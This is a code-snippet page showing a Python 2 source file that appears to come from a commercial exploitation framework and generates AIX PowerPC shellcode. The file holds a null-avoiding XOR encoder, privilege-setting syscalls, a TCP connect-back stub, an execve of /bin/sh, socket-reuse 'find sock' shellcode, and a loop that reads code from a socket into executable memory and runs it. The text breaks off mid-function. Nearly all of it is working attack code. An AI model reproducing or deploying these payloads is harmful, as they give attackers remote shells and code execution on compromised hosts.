Best Python code snippet using pytest
aixShellcodeGenerator.py
Source:aixShellcodeGenerator.py
1##ImmunityHeader v1 2###############################################################################3## File : aixShellcodeGenerator.py4## Description: 5## : 6## Created_On : Tue Oct 27 12:00:08 20097## Created_By : Bas Alberts8## Modified_On: 9## Modified_On: Tue Oct 27 12:05:12 200910## Modified_By: Bas Alberts11## (c) Copyright 2009, Immunity Inc all rights reserved.12###############################################################################13#! /usr/bin/env python14#Proprietary CANVAS source code - use only under the license agreement15#specified in LICENSE.txt in your CANVAS distribution16#Copyright Immunity, Inc, 2002-200617#http://www.immunityinc.com/CANVAS/ for more information18import sys19import socket20import struct21sys.path.append('.')22from MOSDEF import GetMOSDEFlibc23from MOSDEF import mosdef24from ppcShellcodeGenerator import ppc as powerpcShellcodeGenerator25from exploitutils import *26from internal import devlog 27import libs.dtspcd_client as dtspcd_client28def get_aix_version(host):29 """ get the AIX uname from dtspcd """30 try:31 dtuname = dtspcd_client.DTSPCDClient(host)32 dtuname.setup()33 unamedict = dtuname.get_uname()34 OS = unamedict['os'].upper()35 if 'AIX' in OS:36 # need to know what an AIX 6 looks like !!!37 version = '5.%d' % int(unamedict['version'])38 return version39 except Exception, msg:40 import traceback41 traceback.print_exc(file=sys.stderr)42 print "[X] could not determine AIX version via DTSPCD .. assuming 5.1\n"43 44 return '5.1'45class aix_powerpc(powerpcShellcodeGenerator):46 47 def __init__(self, version = "5.1"):48 powerpcShellcodeGenerator.__init__(self)49 self.libc = GetMOSDEFlibc('AIX', 'powerpc', version)50 self.handlers['sync'] = self.sync51 self.handlers['debug'] = self.trap52 self.handlers["exit"] = self.exit53 self.handlers["read_and_exec_loop"] = self.read_and_exec_loop54 self.handlers["read_and_exec_loop_no_errno"] = self.read_and_exec_loop_no_errno55 self.handlers["GOOOFindSock"] = self.GOOOFindSock56 self.handlers["GOOOFindSock_no_errno"] = self.GOOOFindSock_no_errno57 self.handlers["sendreg"] = self.sendreg58 self.handlers["munmap_caller"] = self.munmap_caller59 self.handlers["flushcache"] = self.flushcache60 self.handlers['setuid'] = self.setuid61 self.handlers['seteuid'] = self.seteuid62 self.handlers['setgid'] = self.setgid63 self.handlers['setegid'] = self.setegid64 self.handlers['setreuid'] = self.setreuid65 self.handlers['execve'] = self.execve66 self.handlers['tcp_connect'] = self.tcp_connect67 # this expects assembled payload ..68 def xor_encode(self, payload, version = '5.1', xormask = 0xfe, debug = False):69 """ return an XOR encoded payload """70 71 encoded = []72 for c in payload:73 encoded.append( "%c" % (ord(c) ^ xormask))74 if ord(c) ^ xormask in [0x00]: # badchars75 devlog("aixshellcode","POSSIBLE BAD CHAR in %X ^ %X" % (ord(c), xormask) )76 encoded = ''.join(encoded)77 safe_size = 178 while (not ((safe_size + len(encoded)) & 0xff00) or \79 not ((safe_size + len(encoded)) & 0x00ff)):80 safe_size += 181 # safe mask that doesn't cause nul bytes82 print "Found safe size of %x" % safe_size83 decoder = """ 84 .start:85 xor. r2,r2,r286 subic. r2,r2,187 cmpwi r2,-188 bgtl .start ! preventing common bad char @89 mflr r1590 addi r15,r15, 0x0145 ! offset 17 * 4 == 0x4491 addi r15,r15,-0x010192 xor r16,r16,r1693 addi r16,r16, 0x%x ! size + 0x010194 addi r16,r16,-0x%x95 .xorloop:96 lbzx r17,r16,r1597 xori r18,r17,0xfe%.2x ! XOR98 stbx r18,r16,r1599 subic. r16,r16,1 ! yesh i know .. off by one100 cmpwi r16,-1101 bgtl .xorloop ! preventing common bad char @102 .sync:103 addi r2,r2, 0x%x ! SYS_sync + 0x0101104 addi r2,r2,-0x101105 crorc 6,6,6106 mtlr r15107 .long 0x44ffff02 ! svca 0 .. with no nuls108 .payload:109 """ % ( len(encoded) + safe_size, safe_size, xormask, 0x0101 + int(self.libc.getdefine('SYS_sync'))) 110 decoder = mosdef.assemble(decoder, 'PPC') + encoded111 # dump it for debugging ...112 if debug == True:113 import struct114 i = 0115 print "### pre encoding ###"116 while i < len(payload):117 print "%.8X" % struct.unpack('>L', payload[i:i+4])[0]118 i += 4119 i = 0120 print "### post encoding ###"121 while i < len(decoder):122 print "%.8X" % struct.unpack('>L', decoder[i:i+4])[0]123 i += 4124 return decoder125 def sync(self, args):126 """ sync stub """127 self.code += """128 sync129 isync130 """131 def trap(self, args):132 """ trap stub """133 self.code += """134 trap135 """136 def exit(self, args):137 code="""138 exit:139 li r2, SYS__exit140 crorc 6, 6, 6141 sc142 """143 code = self.libc.patch_defines_with_values(code, ["SYS__exit"])144 self.code += code145 def setuid(self, args):146 code="""147 setuid:148 mflr r20149 li r3, 0x%x150 li r2, SYS_setuid151 addi r20,r20,setuid_out - setuid152 mtlr r20153 crorc 6, 6, 6154 sc155 setuid_out:156 """ % args['uid']157 code = self.libc.patch_defines_with_values(code, ["SYS_setuid"])158 self.code += code159 160 def seteuid(self, args):161 code="""162 seteuid:163 mflr r20164 li r3, 0x%x165 li r2, SYS_seteuid166 addi r20,r20,seteuid_out - seteuid167 mtlr r20168 crorc 6, 6, 6169 sc170 seteuid_out:171 """ % args['uid']172 code = self.libc.patch_defines_with_values(code, ["SYS_seteuid"])173 self.code += code174 def setreuid(self, args):175 code="""176 setreuid:177 mflr r20178 li r3, 0x%x179 li r4, 0x%x180 li r2, SYS_setreuid181 addi r20,r20,setreuid_out - setreuid182 mtlr r20183 crorc 6, 6, 6184 sc185 setreuid_out:186 """ % (args['ruid'], args['euid'])187 code = self.libc.patch_defines_with_values(code, ["SYS_setreuid"])188 self.code += code189 190 def setgid(self, args):191 code="""192 setgid:193 mflr r20194 li r3, 0x%x195 li r2, SYS_setgid196 addi r20,r20,setgid_out - setgid197 mtlr r20198 crorc 6, 6, 6199 sc200 setgid_out:201 """ % args['gid']202 code = self.libc.patch_defines_with_values(code, ["SYS_setgid"])203 self.code += code204 205 def setegid(self, args):206 code="""207 setegid:208 mflr r20209 li r3, 1210 li r4, 0x%x211 li r2, SYS_setgidx212 addi r20,r20,setegid_out - setegid213 mtlr r20214 crorc 6, 6, 6215 sc216 setegid_out:217 """ % args['gid']218 code = self.libc.patch_defines_with_values(code, ["SYS_setgidx"])219 self.code += code220 221 # simple tcp connect back222 def tcp_connect(self, args):223 """224aix 5.2:/usr/include/netinet/in.h225struct in_addr {226 in_addr_t s_addr;227};228...229/*230 * Socket address, internet style.231 */232struct sockaddr_in {233 uchar_t sin_len;234 sa_family_t sin_family;235 in_port_t sin_port;236 struct in_addr sin_addr;237 uchar_t sin_zero[8];238};239 """240 if 'ip' not in args.keys() or 'port' not in args.keys():241 print "XXX: missing ip|port arguments!"242 addr = struct.unpack('!L', socket.inet_aton(args['ip']))[0]243 #print "XXX: %X" % addr244 #print "XXX: ip %s" % args['ip']245 #print "XXX: port %d" % args['port']246 code="""247 !trap248 socket:249 mflr r20250 li r3, AF_INET251 li r4, SOCK_STREAM252 li r5, 0253 li r2, SYS_socket254 addi r20,r20,connect - socket255 mtlr r20256 crorc 6, 6, 6257 sc258 connect:259 ! r3 has fd already260 mr r30, r3 ! mosdef expects reg in r30261 stwu r1,-16(r1) ! get stack space262 li r4, 16 263 stb r4, 0(r1) ! sin_len264 li r4, AF_INET265 stb r4, 1(r1) ! sin_family266 li r4, 0x%.4X267 sth r4, 2(r1) ! sin_port268 lis r4, 0x%.4X ! high word of address269 ori r4, r4, 0x%.4X ! low word of address270 stw r4, 4(r1)271 xor. r4, r4, r4272 stw r4, 8(r1) ! sin_zero273 stw r4, 12(r1) ! sin_zero274 mr r4, r1275 li r5, 16276 li r2, SYS_connect277 addi r20,r20,connect_out - connect278 mtlr r20279 crorc 6, 6, 6280 sc281 connect_out:282 addi r1, r1, 16 ! restore stack pointer283 284 """ % (args['port'],285 (addr>>16) & 0xffff,286 (addr & 0xffff))287 288 code = self.libc.patch_defines_with_values(code, ['AF_INET',289 'SOCK_STREAM',290 'SYS_socket',291 'SYS_connect'])292 self.code += code293 294 # simple shell execve295 def execve(self, args):296 code="""297 !trap298 execve:299 mflr r20300 addi r3, r20, shell - execve301 stw r3, -8(r1)302 xor r4, r4, r4303 mr r5, r4304 stw r4, -4(r1)305 subi r4, r1, 8306 li r2,SYS_execve307 addi r20, r20, execve_out - execve308 mtlr r20309 crorc 6, 6, 6310 sc311 shell:312 ! 8 byte aligned313 .byte 0x2f314 .byte 0x62315 .byte 0x69316 .byte 0x6e317 .byte 0x2f318 .byte 0x73319 .byte 0x68320 .byte 0x00321 execve_out:322 """323 code = self.libc.patch_defines_with_values(code, ['SYS_execve'])324 self.code += code325 326 def GOOOFindSock(self,args):327 code = """328 ! input:329 ! ------330 ! nothing331 332 ! output:333 ! -------334 ! r30 = fd335 ! r21 = GOOO_pcloc336 337 ! before all asm code (MOSDEF entry point)338 339 GOOOFindSock:340 341 ! get our current location in memory342 xor. r6, r6, r6343 bnel GOOOFindSock344 ! <-- that addr is now in $lr345 GOOO_pcloc:346 mflr r21347 348 ! sync our memory block from cache349 addi r20, r21, sync_out - GOOO_pcloc350 mtlr r20351 li r2, SYS_sync352 crorc 6, 6, 6353 sc354 sync_out:355 356 ! prepare the stack and static values357 ! sp = fp - 9456358 ! sp: [saved regs] [sa(128) 56:184] [fds(1024*8=8192) 184:8376] [buf(1024) 8376:9400] [salen(4) 9400:9404]359 stwu r1, -9456(r1) ! save stack360 addi r22, r1, 184 ! r22:fds ! 8192361 addi r26, r1, 56 ! r26:sa -> buf ! 128 XXX362 addi r23, r1, 8376 ! r23:buf ! 1024363 li r27, 128 ! r27:sizeof(ss)364 lwz r25, 9476(r1) ! 20 + 9456 = 20(sp)365 lwz r25, 64(r25) ! r25:&errno366 mr r29, r22 ! r29:pfds = r22:fds367 lis r5, 18255368 ori r24, r5, 20303 ! r24 = "GOOO"369 370 GOOO_main_loop:371 li r28, 0 ! nfds = 0372 li r30, 10 ! for r30:fd_temp = 1024373 374 getpeername_loop:375 stw r27, 9400(r1) ! salen:9400(r1) = *r27376 377 ! getpeername(fd, sa, &salen);378 mr r3, r30 ! arg0 = fd_temp379 addi r4, r1, 56 ! arg1 = sa380 addi r5, r1, 9400 ! arg2 = salen381 addi r20, r21, getpeername_out - GOOO_pcloc382 mtlr r20383 li r2, SYS_ngetpeername384 crorc 6, 6, 6385 sc386 getpeername_out:387 388 cmpwi r3, -1389 bne- getpeername_succeeded ! getpeername() != -1390 ! here getpeername() returned -1391 lwz r3, 0(r25) ! errno392 cmpwi r3, EBADF393 beq- close_badfd_out ! if errno == EBADF, errno != [ENOTSOCK or ENOTCONN]394 395 ! getpeername() returned ENOTSOCK or ENOTCONN -> close fd396 mr r3,r30 ! arg0 = fd_temp397 addi r20, r21, close_badfd_out - GOOO_pcloc398 mtlr r20399 li r2, SYS_close400 crorc 6, 6, 6401 sc402 close_badfd_out:403 404 getpeername_preloop:405 addic. r30, r30, -1 ! fd_temp--406 bge+ getpeername_loop407 408 ! if nfds == 0 smth is wrong409 cmpwi r28, 0 ! nfds == 0 -> GOOO_failed410 beq- GOOO_failed411 412 ! LOOP set events = POLLIN413 mr r29, r22 ! r29:pfds = r22:fds414 ble- poll_set_events_done415 mtctr r28 ! r28:nfds416 li r9, POLLIN ! events = POLLIN417 li r0, 0 ! revents = 0418 poll_set_events:419 sth r9, 4(r29) ! pfds->events = POLLIN420 sth r0, 6(r29) ! pfds->revents = 0421 addi r29, r29, 8 ! pfds++422 bdnz+ poll_set_events423 poll_set_events_done:424 425 call_poll:426 mr r3, r22 ! arg0 = r22:fds427 mr r4, r28 ! arg1 = r28:nfds428 li r5, INF_TIMEOUT429 addi r20, r21, call_poll_out - GOOO_pcloc430 mtlr r20431 li r2, SYS_poll432 crorc 6, 6, 6433 sc434 call_poll_out:435 436 ! check poll() returned -1437 cmpwi r3, -1438 beq- poll_returned_error439 ! check poll() returned 0440 cmpwi r3,0441 beq- GOOO_failed442 443 ! poll() returned something XXX444 mr r29, r22 ! r29:pfds = r22:fds445 li r30, 0 ! for fd_temp = 0446 cmpw r30, r28 ! fd_temp < r28:nfds447 bge- GOOO_main_loop448 449 check_next_polled_revents:450 lhz r7, 6(r29) ! r7 = pfds->revents451 ori r6, r7, POLLIN452 cmpwi r6, 0 ! if (pfds->revents | POLLIN)453 bne- revents_IS_POLLIN454 455 revents_isnt_POLLIN:456 addi r30, r30, 1 ! fd_temp++457 addi r29, r29, 8 ! pfds++458 cmpw r30, r28 ! fd_temp < r28:nfds459 blt+ check_next_polled_revents460 b GOOO_main_loop461 462 revents_IS_POLLIN:463 ! read_magic:464 lwz r3, 0(r29) ! arg0 = pfds->fd465 mr r4, r23 ! arg1 = r4 = r23:buf466 li r5, 4 ! arg2 = sizeof(int) = 4467 li r5, 4468 addi r20, r21, read_magic_out - GOOO_pcloc469 mtlr r20470 li r2, SYS_read471 crorc 6, 6, 6472 sc473 read_magic_out:474 475 cmpwi r3,4 ! r == sizeof(MAGIC) - 1476 beq- good_magic_size_read477 478 ! closing bad polled fd479 close_polled_fd_that_didnt_answered_well_to_trigger:480 li r2, SYS_close481 lwz r3,0(r29) ! arg0 = pfds->fd482 addi r20, r21, close_badmagicfd_out - GOOO_pcloc483 mtlr r20484 crorc 6, 6, 6485 sc486 close_badmagicfd_out:487 488 b revents_isnt_POLLIN489 490 good_magic_size_read:491 lwz r9, 8376(r1) ! buf = 8376(r1)492 cmpw r9, r24 ! *lmagic == LMAGIC493 bne+ close_polled_fd_that_didnt_answered_well_to_trigger494 495 ! success MAGIC!496 lwz r30, 0(r29) ! saved_fd = pfds->fd // saving valid_fd497 498 ! reply MAGIC499 mr r3, r30 ! arg0 = fd500 li r5, 4 ! arg2 = 4501 mr r4, r23 ! arg1 = buf502 addi r20, r21, write_trigger_out - GOOO_pcloc503 mtlr r20504 li r2, SYS_write505 crorc 6, 6, 6506 sc507 write_trigger_out:508 509 ! LOOP close all other fd510 ! here r28 = nfds511 mr r29, r22 ! r29 = r22:fds512 cmpwi r28, 0 ! while r < nfds ???513 ble- found_sockfd514 mr r31, r28 ! tmpfd = r31 = nfds515 close_all_but_saved_fd:516 lwz r3, 0(r29) ! arg0 = pfds->fd517 addi r29, r29, 8 ! pfds++518 cmpw r30, r3 ! pfds->fd == saved_fd ?519 beq- do_not_close_the_saved_fd520 ! else close!!!521 addi r20, r21, close_all_but_saved_fd_out - GOOO_pcloc522 mtlr r20523 li r2, SYS_close524 crorc 6, 6, 6525 sc526 close_all_but_saved_fd_out:527 do_not_close_the_saved_fd:528 addic. r31, r31, -1 ! tmpfd--529 bne+ close_all_but_saved_fd530 531 b found_sockfd532 533 getpeername_succeeded:534 ! fdflags = fcntl(saved_fd, F_GETFL, 0);535 mr r3, r30 ! arg0 = fd_temp536 li r4, F_GETFL ! arg1537 li r5, 0 ! arg2538 addi r20, r21, fcntl_getsockflags_out1 - GOOO_pcloc539 mtlr r20540 li r2, SYS_fcntl541 crorc 6, 6, 6542 sc543 fcntl_getsockflags_out1:544 545 ! flags in r3546 cmpwi r3, -1547 bne+ fcntl_getsockflags_ok1548 fcntl_getsockflags_failed1:549 li r3, 0550 fcntl_getsockflags_ok1:551 ori r5, r3, O_NONBLOCK ! arg2 = O_NONBLOCK552 553 ! fcntl(saved_fd, F_SETFL, fdflags | O_NONBLOCK);554 mr r3, r30 ! arg0 = fd_temp555 li r4, F_SETFL ! arg1 = F_SETFL556 addi r20, r21, fcntl_out - GOOO_pcloc557 mtlr r20558 li r2, SYS_fcntl559 crorc 6, 6, 6560 sc561 fcntl_out:562 563 addi r28, r28, 1 ! nfds++;564 stw r30, 0(r29) ! pfds->fd = fd;565 addi r29, r29, 8 ! pfds++;566 b getpeername_preloop 567 568 poll_returned_error:569 ! check poll() returned EINTR570 lwz r4, 0(r25) ! errno571 cmpwi r4, EINTR ! errno == EINTR?572 beq- GOOO_main_loop573 ! poll() fatal error574 575 ! _exit(random)576 GOOO_failed:577 li r2, SYS__exit578 crorc 6, 6, 6579 sc580 581 found_sockfd:582 ! out of GOOOFindSock: success583 584 ! fcntl(saved_fd, F_GETFL, 0);585 li r2, SYS_fcntl586 mr r3, r30 ! arg0 = saved_fd587 li r4, F_GETFL ! arg1588 li r5, 0 ! arg2589 addi r20, r21, fcntl_getsockflags_out - GOOO_pcloc590 mtlr r20591 crorc 6, 6, 6592 sc593 fcntl_getsockflags_out:594 595 ! flags in r3596 cmpwi r3, -1597 bne+ fcntl_getsockflags_ok598 fcntl_getsockflags_failed:599 li r3, 0600 fcntl_getsockflags_ok:601 andi. r5, r3, O_BLOCK ! arg2602 603 ! fcntl(saved_fd, F_SETFL, ~O_NONBLOCK);604 li r2, SYS_fcntl605 mr r3, r30 ! arg0 = saved_fd606 li r4, F_SETFL ! arg1 = F_SETFL607 addi r20, r21, fcntl_setblock_out - GOOO_pcloc608 mtlr r20609 crorc 6, 6, 6610 sc611 fcntl_setblock_out:612 613 addi r1,r1,9456 ! restore stack614 615 ! here come another code, and $pc continue executing it616 ! remember we have r30 = sockfd617 """618 syscalls = ["SYS_sync", "SYS_ngetpeername", "SYS_poll", "SYS__exit"]619 syscalls += ["SYS_fcntl", "SYS_close", "SYS_read", "SYS_write"]620 constants = ["EBADF", "EINTR", "POLLIN", "INF_TIMEOUT", "F_GETFL", "F_SETFL", "O_NONBLOCK", "O_BLOCK"]621 code = self.libc.patch_defines_with_values(code, syscalls + constants)622 self.code+=code623 624 # for when you hose errno loc on stack ovf625 def GOOOFindSock_no_errno(self,args):626 code = """627 ! input:628 ! ------629 ! nothing630 631 ! output:632 ! -------633 ! r30 = fd634 ! r21 = GOOO_pcloc635 636 ! before all asm code (MOSDEF entry point)637 638 GOOOFindSock:639 640 ! get our current location in memory641 xor. r6, r6, r6642 bnel GOOOFindSock643 ! <-- that addr is now in $lr644 GOOO_pcloc:645 mflr r21646 647 ! sync our memory block from cache648 addi r20, r21, sync_out - GOOO_pcloc649 mtlr r20650 li r2, SYS_sync651 crorc 6, 6, 6652 sc653 sync_out:654 655 ! prepare the stack and static values656 ! sp = fp - 9456657 ! sp: [saved regs] [sa(128) 56:184] [fds(1024*8=8192) 184:8376] [buf(1024) 8376:9400] [salen(4) 9400:9404]658 stwu r1, -9456(r1) ! save stack659 addi r22, r1, 184 ! r22:fds ! 8192660 addi r26, r1, 56 ! r26:sa -> buf ! 128 XXX661 addi r23, r1, 8376 ! r23:buf ! 1024662 li r27, 128 ! r27:sizeof(ss)663 mr r29, r22 ! r29:pfds = r22:fds664 lis r5, 18255665 ori r24, r5, 20303 ! r24 = "GOOO"666 667 GOOO_main_loop:668 li r28, 0 ! nfds = 0669 li r30, 10 ! for r30:fd_temp = 1024670 671 getpeername_loop:672 stw r27, 9400(r1) ! salen:9400(r1) = *r27673 674 ! getpeername(fd, sa, &salen);675 mr r3, r30 ! arg0 = fd_temp676 addi r4, r1, 56 ! arg1 = sa677 addi r5, r1, 9400 ! arg2 = salen678 addi r20, r21, getpeername_out - GOOO_pcloc679 mtlr r20680 li r2, SYS_ngetpeername681 crorc 6, 6, 6682 sc683 getpeername_out:684 685 cmpwi r3, -1686 bne- getpeername_succeeded ! getpeername() != -1687 688 getpeername_preloop:689 addic. r30, r30, -1 ! fd_temp--690 bge+ getpeername_loop691 692 ! if nfds == 0 smth is wrong693 cmpwi r28, 0 ! nfds == 0 -> GOOO_failed694 beq- GOOO_failed695 696 ! LOOP set events = POLLIN697 mr r29, r22 ! r29:pfds = r22:fds698 ble- poll_set_events_done699 mtctr r28 ! r28:nfds700 li r9, POLLIN ! events = POLLIN701 li r0, 0 ! revents = 0702 poll_set_events:703 sth r9, 4(r29) ! pfds->events = POLLIN704 sth r0, 6(r29) ! pfds->revents = 0705 addi r29, r29, 8 ! pfds++706 bdnz+ poll_set_events707 poll_set_events_done:708 709 call_poll:710 mr r3, r22 ! arg0 = r22:fds711 mr r4, r28 ! arg1 = r28:nfds712 li r5, INF_TIMEOUT713 addi r20, r21, call_poll_out - GOOO_pcloc714 mtlr r20715 li r2, SYS_poll716 crorc 6, 6, 6717 sc718 call_poll_out:719 720 ! check poll() returned -1721 cmpwi r3, -1722 beq- poll_returned_error723 ! check poll() returned 0724 cmpwi r3,0725 beq- GOOO_failed726 727 ! poll() returned something XXX728 mr r29, r22 ! r29:pfds = r22:fds729 li r30, 0 ! for fd_temp = 0730 cmpw r30, r28 ! fd_temp < r28:nfds731 bge- GOOO_main_loop732 733 check_next_polled_revents:734 lhz r7, 6(r29) ! r7 = pfds->revents735 ori r6, r7, POLLIN736 cmpwi r6, 0 ! if (pfds->revents | POLLIN)737 bne- revents_IS_POLLIN738 739 revents_isnt_POLLIN:740 addi r30, r30, 1 ! fd_temp++741 addi r29, r29, 8 ! pfds++742 cmpw r30, r28 ! fd_temp < r28:nfds743 blt+ check_next_polled_revents744 b GOOO_main_loop745 746 revents_IS_POLLIN:747 ! read_magic:748 lwz r3, 0(r29) ! arg0 = pfds->fd749 mr r4, r23 ! arg1 = r4 = r23:buf750 li r5, 4 ! arg2 = sizeof(int) = 4751 li r5, 4752 addi r20, r21, read_magic_out - GOOO_pcloc753 mtlr r20754 li r2, SYS_read755 crorc 6, 6, 6756 sc757 read_magic_out:758 759 cmpwi r3,4 ! r == sizeof(MAGIC) - 1760 beq- good_magic_size_read761 762 ! closing bad polled fd763 close_polled_fd_that_didnt_answered_well_to_trigger:764 li r2, SYS_close765 lwz r3,0(r29) ! arg0 = pfds->fd766 addi r20, r21, close_badmagicfd_out - GOOO_pcloc767 mtlr r20768 crorc 6, 6, 6769 sc770 close_badmagicfd_out:771 772 b revents_isnt_POLLIN773 774 good_magic_size_read:775 lwz r9, 8376(r1) ! buf = 8376(r1)776 cmpw r9, r24 ! *lmagic == LMAGIC777 bne+ close_polled_fd_that_didnt_answered_well_to_trigger778 779 ! success MAGIC!780 lwz r30, 0(r29) ! saved_fd = pfds->fd // saving valid_fd781 782 ! reply MAGIC783 mr r3, r30 ! arg0 = fd784 li r5, 4 ! arg2 = 4785 mr r4, r23 ! arg1 = buf786 addi r20, r21, write_trigger_out - GOOO_pcloc787 mtlr r20788 li r2, SYS_write789 crorc 6, 6, 6790 sc791 write_trigger_out:792 793 ! LOOP close all other fd794 ! here r28 = nfds795 mr r29, r22 ! r29 = r22:fds796 cmpwi r28, 0 ! while r < nfds ???797 ble- found_sockfd798 mr r31, r28 ! tmpfd = r31 = nfds799 close_all_but_saved_fd:800 lwz r3, 0(r29) ! arg0 = pfds->fd801 addi r29, r29, 8 ! pfds++802 cmpw r30, r3 ! pfds->fd == saved_fd ?803 beq- do_not_close_the_saved_fd804 ! else close!!!805 addi r20, r21, close_all_but_saved_fd_out - GOOO_pcloc806 mtlr r20807 li r2, SYS_close808 crorc 6, 6, 6809 sc810 close_all_but_saved_fd_out:811 do_not_close_the_saved_fd:812 addic. r31, r31, -1 ! tmpfd--813 bne+ close_all_but_saved_fd814 815 b found_sockfd816 817 getpeername_succeeded:818 ! fdflags = fcntl(saved_fd, F_GETFL, 0);819 mr r3, r30 ! arg0 = fd_temp820 li r4, F_GETFL ! arg1821 li r5, 0 ! arg2822 addi r20, r21, fcntl_getsockflags_out1 - GOOO_pcloc823 mtlr r20824 li r2, SYS_fcntl825 crorc 6, 6, 6826 sc827 fcntl_getsockflags_out1:828 829 ! flags in r3830 cmpwi r3, -1831 bne+ fcntl_getsockflags_ok1832 fcntl_getsockflags_failed1:833 li r3, 0834 fcntl_getsockflags_ok1:835 ori r5, r3, O_NONBLOCK ! arg2 = O_NONBLOCK836 837 ! fcntl(saved_fd, F_SETFL, fdflags | O_NONBLOCK);838 mr r3, r30 ! arg0 = fd_temp839 li r4, F_SETFL ! arg1 = F_SETFL840 addi r20, r21, fcntl_out - GOOO_pcloc841 mtlr r20842 li r2, SYS_fcntl843 crorc 6, 6, 6844 sc845 fcntl_out:846 847 addi r28, r28, 1 ! nfds++;848 stw r30, 0(r29) ! pfds->fd = fd;849 addi r29, r29, 8 ! pfds++;850 b getpeername_preloop 851 852 poll_returned_error:853 ! poll() fatal error? deal with EINTR, but no errno!854 855 ! _exit(random)856 GOOO_failed:857 li r2, SYS__exit858 crorc 6, 6, 6859 sc860 861 found_sockfd:862 ! out of GOOOFindSock: success863 864 ! fcntl(saved_fd, F_GETFL, 0);865 li r2, SYS_fcntl866 mr r3, r30 ! arg0 = saved_fd867 li r4, F_GETFL ! arg1868 li r5, 0 ! arg2869 addi r20, r21, fcntl_getsockflags_out - GOOO_pcloc870 mtlr r20871 crorc 6, 6, 6872 sc873 fcntl_getsockflags_out:874 875 ! flags in r3876 cmpwi r3, -1877 bne+ fcntl_getsockflags_ok878 fcntl_getsockflags_failed:879 li r3, 0880 fcntl_getsockflags_ok:881 andi. r5, r3, O_BLOCK ! arg2882 883 ! fcntl(saved_fd, F_SETFL, ~O_NONBLOCK);884 li r2, SYS_fcntl885 mr r3, r30 ! arg0 = saved_fd886 li r4, F_SETFL ! arg1 = F_SETFL887 addi r20, r21, fcntl_setblock_out - GOOO_pcloc888 mtlr r20889 crorc 6, 6, 6890 sc891 fcntl_setblock_out:892 893 addi r1,r1,9456 ! restore stack894 895 ! here come another code, and $pc continue executing it896 ! remember we have r30 = sockfd897 """898 syscalls = ["SYS_sync", "SYS_ngetpeername", "SYS_poll", "SYS__exit"]899 syscalls += ["SYS_fcntl", "SYS_close", "SYS_read", "SYS_write"]900 constants = ["EBADF", "EINTR", "POLLIN", "INF_TIMEOUT", "F_GETFL", "F_SETFL", "O_NONBLOCK", "O_BLOCK"]901 code = self.libc.patch_defines_with_values(code, syscalls + constants)902 self.code+=code903 904 def read_and_exec_loop_no_errno(self, args):905 """ use this on stack overflows that break errno loc! """906 907 mmap_protections = self.libc.getdefine('PROT_EXEC')908 mmap_protections |= self.libc.getdefine('PROT_READ')909 mmap_protections |= self.libc.getdefine('PROT_WRITE')910 911 # we want to see if our 'fd' argument is a number or a register912 try:913 fd = int(args["fd"])914 fd_set_instr = "li"915 except ValueError:916 # i hope we got a register917 fd_set_instr = "mr"918 919 code = """920 ! r30 = fd921 ! r31 = codebuf // mmap922 ! r29 = bufsize923 ! r21 = pcloc924 ! r28 = codeptr925 ! r20 = tmp926 ! r18 = main_loop927 928 ! before all asm code (MOSDEF entry point)929 read_and_exec_loop:930 931 ! get our current location in memory932 xor. r6, r6, r6933 bnel read_and_exec_loop934 ! <-- that addr is now in $lr935 pcloc:936 mflr r21937 938 """939 940 # if fd is already in $r30 we wont set it again just because it's nicer941 # but we also save 4 bytes!!!942 if str(args["fd"]) != "r30":943 code += """944 ! set provided sockfd945 FD_SET_INSTR r30, FD ! fd946 """947 code += """948 949 ! mmap(0, 0x10000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_ANON, -1, 0);950 li r3, 0951 lis r4, 1952 li r5, mmap_protections953 li r6, MAP_ANON954 li r7, -1955 mr r8, r3956 addi r20, r21, mmap_out - pcloc957 mtlr r20958 li r2, SYS_mmap959 crorc 6, 6, 6960 sc961 mmap_out:962 963 cmpwi r3, MAP_FAILED964 beq- failed965 mr r31, r3 ! r31 = codebuf966 967 ! save <here> in r18 to come back directly here after exec the mmap buffer968 addi r18, r21, main_loop - pcloc969 970 main_loop:971 972 ! set the first instruction of the mmap buffer: restore lr from r18973 set r28, restore_lr_after_jmp - pcloc974 lwzx r28, r21, r28975 stw r28, 0(r31)976 977 ! read(FD, &nbytes, sizeof(nbytes));978 read_size:979 mr r3, r30 ! r30 = sockfd980 addi r4, r31, 4 ! &mmap[4]981 li r5, 4982 addi r20, r21, readsize_out - pcloc983 mtlr r20984 li r2, SYS_kread985 crorc 6, 6, 6986 sc987 readsize_out:988 989 cmplwi r3, 4 ! if (r != sizeof(nbytes))990 beq+ readsize_is_4_valid991 b failed992 readsize_is_4_valid:993 lwz r29, 4(r31) ! r29 = *mmap[4] = codesize994 995 ! prepare r28 before read loop996 addi r28, r31, 4 ! r28 = mmap_ptr = &mmap[4]997 998 ! read(FD, codeptr, nbytes);999 read_buf:1000 cmpwi r29, 0 ! while (nbytes) ! do we still need to read some bytes?1001 beq- exec_code ! if no, we can exec the recently read code1002 mr r3, r30 ! arg0 = r30 = sockfd1003 mr r4, r28 ! arg1 = mmap_ptr1004 mr r5, r29 ! arg2 = codesize1005 addi r20, r21, read_out - pcloc1006 mtlr r201007 li r2, SYS_kread1008 crorc 6, 6, 61009 sc1010 read_out:1011 1012 cmpwi r3, 01013 bgt+ read_out_ok ! we read smth1014 b failed ! no errno support on stack overflows1015 read_out_ok:1016 add r28, r28, r3 ! mmap_ptr += read_size1017 subfc r29, r3, r29 ! codesize -= read_size1018 bne- read_buf ! if codesize != 0: continue to read on sockfd1019 1020 exec_code:1021 mtlr r311022 li r2, SYS_sync1023 crorc 6, 6, 61024 sc1025 1026 ! _exit(random)1027 failed:1028 li r2, SYS__exit1029 crorc 6, 6, 61030 sc1031 1032 ! never reached1033 1034 ! following is used to patch sent code1035 restore_lr_after_jmp:1036 mtlr r181037 """1038 syscalls = ["SYS_mmap", "SYS_kread", "SYS__exit", "SYS_sync"]1039 constants = ["MAP_ANON", "MAP_FAILED"]1040 code = self.libc.patch_defines_with_values(code, syscalls + constants)1041 code = code.replace('mmap_protections', "%s" % mmap_protections)1042 code = code.replace("FD_SET_INSTR", fd_set_instr)1043 code = code.replace("FD", str(args["fd"]))1044 self.code+=code1045 1046 def read_and_exec_loop(self, args):1047 1048 mmap_protections = self.libc.getdefine('PROT_EXEC')1049 mmap_protections |= self.libc.getdefine('PROT_READ')1050 mmap_protections |= self.libc.getdefine('PROT_WRITE')1051 1052 # we want to see if our 'fd' argument is a number or a register1053 try:1054 fd = int(args["fd"])1055 fd_set_instr = "li"1056 except ValueError:1057 # i hope we got a register1058 fd_set_instr = "mr"1059 1060 code = """1061 ! r30 = fd1062 ! r31 = codebuf // mmap1063 ! r29 = 